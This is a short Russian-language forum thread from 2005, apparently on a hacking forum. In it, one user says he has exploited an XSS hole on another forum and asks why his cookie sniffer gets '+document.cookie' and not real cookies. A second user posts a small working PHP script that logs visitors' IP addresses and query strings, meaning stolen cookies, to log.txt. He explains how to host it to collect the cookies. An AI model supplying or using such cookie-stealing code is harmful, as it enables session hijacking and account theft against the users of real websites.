Помощь по снифферу

Discussion in 'Песочница' started by kot777, 24 Apr 2005.

  1. kot777

    kot777 O-la-la!

    Joined:
    13 Aug 2004
    Messages:
    588
    Likes Received:
    435
    Reputations:
    454
    Народ, понимающий в XSS отзовотесь. Нашел XSS уязвимость на форуме, использовал её. Но на античатовский сниффер вместо куков приходит лишь
    +document.cookie. Хотя этот форум дает куки и на компе я их нашел. Почему не приходят куки?
     
  2. sasha02

    sasha02 New Member

    Joined:
    23 Apr 2005
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Незнаю. Лично я пользюсь вот таким снифером:
    <?
    $f=Fopen("./log.txt","a+t") or die ("!!!");
    Fputs($f,"$REMOTE_ADDR ");
    Fputs($f,$QUERY_STRING);
    Fputs($f,"\n");
    ?>
    Сохраняешь его с расширенем php и все+ пустой txt файл создаешь с названием log. Скидываешь это на хостинг (тот же Holm) и пользуйся сколько хочешь. Все куки сохраняются в файле log.txt
     
Loading...